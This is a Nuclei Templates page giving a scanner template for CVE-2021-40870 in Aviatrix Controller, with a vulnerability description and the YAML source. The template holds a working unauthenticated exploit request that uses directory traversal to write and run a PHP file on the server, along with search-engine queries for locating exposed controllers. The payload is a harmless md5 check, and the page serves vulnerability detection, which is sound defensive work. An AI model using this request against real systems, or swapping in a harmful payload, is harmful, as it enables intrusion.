Skip to content
Nuclei Templates

Aviatrix Controller 6.x before 6.5-1804.1922 - Remote Command Execution

ID: CVE-2021-40870

Severity: critical

Author: pikpikcu

Tags: cve2021,cve,intrusive,packetstorm,rce,aviatrix,kev,fileupload

Description

Section titled “Description”

Aviatrix Controller 6.x before 6.5-1804.1922 contains a vulnerability that allows unrestricted upload of a file with a dangerous type, which allows an unauthenticated user to execute arbitrary code via directory traversal.

YAML Source

Section titled “YAML Source”
id: CVE-2021-40870


info:
  name: Aviatrix Controller 6.x before 6.5-1804.1922 - Remote Command Execution
  author: pikpikcu
  severity: critical
  description: Aviatrix Controller 6.x before 6.5-1804.1922 contains a vulnerability that allows unrestricted upload of a file with a dangerous type, which allows an unauthenticated user to execute arbitrary code via directory traversal.
  impact: |
    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system.
  remediation: |
    Upgrade Aviatrix Controller to version 6.5-1804.1922 or later to mitigate this vulnerability.
  reference:
    - https://docs.aviatrix.com/HowTos/UCC_Release_Notes.html#security-note-9-11-2021
    - https://wearetradecraft.com/advisories/tc-2021-0002/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-40870
    - http://packetstormsecurity.com/files/164461/Aviatrix-Controller-6.x-Path-Traversal-Code-Execution.html
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-40870
    cwe-id: CWE-23
    epss-score: 0.91719
    epss-percentile: 0.98896
    cpe: cpe:2.3:a:aviatrix:controller:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: aviatrix
    product: controller
    shodan-query: http.title:"aviatrix cloud controller"
    fofa-query: title="aviatrix cloud controller"
    google-query: intitle:"aviatrix cloud controller"
  tags: cve2021,cve,intrusive,packetstorm,rce,aviatrix,kev,fileupload
variables:
  string: "CVE-2021-40870"


http:
  - raw:
      - |
        POST /v1/backend1 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        CID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/{{randstr}}.php&data=<?php echo md5("{{string}}");unlink(__FILE__);?>
      - |
        GET /v1/{{randstr}}.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - '{{md5(string)}}'


      - type: status
        status:
          - 200
# digest: 4a0a00473045022100f5fc939b9f90383f6dc180d299c2b269abef13dac3f22bcb79e7aaef0f64644d022019993a2f2be27c491f4283c26ec80caa39287f4bc879b17c902985b7dac47a9c:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-40870.yaml"

View on Github